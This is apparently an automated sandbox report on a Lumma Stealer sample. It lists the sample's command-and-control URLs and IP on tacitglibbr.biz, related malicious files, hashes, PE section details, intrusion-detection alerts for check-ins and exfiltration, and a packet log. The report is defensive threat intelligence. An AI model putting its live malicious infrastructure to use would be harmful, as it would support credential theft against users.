                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://tacitglibbr.biz/apizTwf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://tacitglibbr.biz/dwf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://tacitglibbr.biz:443/apiDQwf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://tacitglibbr.biz:443/apilwf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://tacitglibbr.biz/apillwf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://x1.c.lencr.org/0wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.i.lencr.org/0wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://tacitglibbr.biz:443/apin.txtPKwf1Ps82LYF.exe, 00000000.00000002.1617971497.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565544561.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540788781.0000000001052000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://support.mozilla.org/products/firefoxgro.allwf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://tacitglibbr.biz:443/apiwf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.50.161
                                                                              tacitglibbr.bizUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1576242
                                                                              Start date and time:2024-12-16 17:14:03 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 4m 36s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:5
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:wf1Ps82LYF.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:9b88afc4511d0fe8aca6080d34f2dd66.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 2
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Stop behavior analysis, all processes terminated
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target wf1Ps82LYF.exe, PID 7588 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: wf1Ps82LYF.exe
                                                                              TimeTypeDescription
                                                                              11:15:01API Interceptor8x Sleep call for process: wf1Ps82LYF.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.50.161NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                      4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        hiip7UoiAq.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  fp2e7a.wpc.phicdn.netYPgggL1oh7.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  SPHINX.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  AV4b38nlhN.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 192.229.221.95
                                                                                                  msimg32.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 192.229.221.95
                                                                                                  YBkzZEtVcK.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  xGW5bGPCIg.exeGet hashmaliciousCryptbotBrowse
                                                                                                  • 192.229.221.95
                                                                                                  SOjID1t3un.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 192.229.221.95
                                                                                                  CrSpoof.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  tacitglibbr.bizNYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 104.21.50.161
                                                                                                  qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 104.21.50.161
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                  • 172.67.164.37
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  UUH30xVTpr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 172.67.164.37
                                                                                                  4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  yYJUaOwKa8.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.164.37
                                                                                                  Wqd6nMOfmG.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 172.67.164.37
                                                                                                  hiip7UoiAq.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUShttps://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdjGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.142.119
                                                                                                  https://qrs.ly/gggdyxxGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 104.26.14.131
                                                                                                  https://tinyurl.com/ajdoea10dk66Get hashmaliciousUnknownBrowse
                                                                                                  • 104.21.96.1
                                                                                                  IMAKBWPY.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.219.27
                                                                                                  JIKJCBEX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.80.1
                                                                                                  YTRNYRXC.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  https://blackcreekgroup.yardione.com/Account/Login%3Chttps://blackcreekgroup.yardione.com/Account/Login%3EGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 172.64.41.3
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1IMAKBWPY.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  JIKJCBEX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  YTRNYRXC.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 104.21.50.161
                                                                                                  qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 104.21.50.161
                                                                                                  InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  54FApnc7eR.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                  • 104.21.50.161
                                                                                                  No context
                                                                                                  No created / dropped files found
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.949104699097024
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:wf1Ps82LYF.exe
                                                                                                  File size:1'884'672 bytes
                                                                                                  MD5:9b88afc4511d0fe8aca6080d34f2dd66
                                                                                                  SHA1:4d0abcc2f053e2b17d3064f65dffc171f873b043
                                                                                                  SHA256:5d2b5f0d8b9fbfb231b99678bb332bee9cfef9aa6c2ed7e994dbabbb83639004
                                                                                                  SHA512:f4e9c5bbbb27eb07c192226390833714b82b94cfa4a9fb6b0e0a75ece7b51eb009b9c2bdc3b70c2ee77a56b7496c1251c50888471cddf32a2f307eaf134b1490
                                                                                                  SSDEEP:49152:5Ir6N++PRgxCGbe4K9FTTH/e3p7IJIZ1KFvGTPeMXPgnktG:t+PHbe4qe5601ssGM/Nt
                                                                                                  TLSH:CD953313DAC3FE21CF3A2A70B9F65600E9B775909F23CDA7A10111509CBD2B6786F588
                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................J...........@.................................T0..h..
                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                  Entrypoint:0x8a9000
                                                                                                  Entrypoint Section:.taggant
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:6
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                  Instruction
                                                                                                  jmp 00007F5D20F3ED8Ah
                                                                                                  push fs
                                                                                                  sbb al, 00h
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  jmp 00007F5D20F40D85h
                                                                                                  add byte ptr [0000000Ah], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], dl
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [ebx], al
                                                                                                  or al, byte ptr [eax]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax+eax*4], cl
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  adc byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add eax, 0000000Ah
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], dh
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax+eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  and al, byte ptr [eax]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                  add byte ptr [eax], al
                                                                                                  adc byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add eax, 0000000Ah
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], dh
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [edx], cl
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [ecx], al
                                                                                                  add byte ptr [eax], 00000000h
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  adc byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add dword ptr [edx], ecx
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  xor byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  pop es
                                                                                                  add byte ptr [eax], 00000000h
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x2b0.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  0x10000x510000x2480031914c174ef76f0252f1fe30ab037430False0.9974983946917808data7.9796014648206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x520000x2b00x400b1e85b1cd09caefc2d43268be72ef161False0.3603515625data5.183452444303608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  0x540000x2b00000x2006c69d6903976db20fee19a3923628a88unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  avxzjrga0x3040000x1a40000x1a3c0025b29ba72184c95aca3a75685cabffcbFalse0.9949793403811793data7.954101941370097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  vgfnourc0x4a80000x10000x400e1b9adf886ef24e078e0ac11c1e53c7bFalse0.787109375data6.202987373109183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .taggant0x4a90000x30000x220060797d02aa3b01561581d7086f49f3ecFalse0.05813419117647059DOS executable (COM)0.7384836028064443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_MANIFEST0x520580x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                  DLLImport
                                                                                                  kernel32.dlllstrcpy
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-16T17:15:00.530872+01002058230ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)1192.168.2.8593011.1.1.153UDP
                                                                                                  2024-12-16T17:15:02.013493+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849706104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:02.013493+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:02.821315+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:02.821315+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:04.115519+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849707104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:04.115519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:04.875796+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849707104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:04.875796+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:06.573219+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849708104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:06.573219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:07.438616+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849708104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:08.827724+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849709104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:08.827724+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:11.598593+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849710104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:11.598593+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:14.243882+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849711104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:14.243882+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:16.747072+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849712104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:16.747072+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:20.493181+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.849715104.21.50.161443TCP
                                                                                                  2024-12-16T17:15:20.493181+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715104.21.50.161443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 16, 2024 17:15:00.688294888 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:00.688353062 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:00.688442945 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:00.691745996 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:00.691764116 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.013267994 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.013493061 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.015795946 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.015826941 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.016087055 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.064778090 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.064840078 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.065119982 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.821317911 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.821415901 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.821609020 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.824321985 CET49706443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.824368954 CET44349706104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.833287954 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.833328009 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:02.833547115 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.833894014 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:02.833905935 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.115375042 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.115519047 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.193645000 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.193681002 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.194653034 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.195992947 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.195992947 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.196163893 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.875752926 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.875854969 CET44349707104.21.50.161192.168.2.8
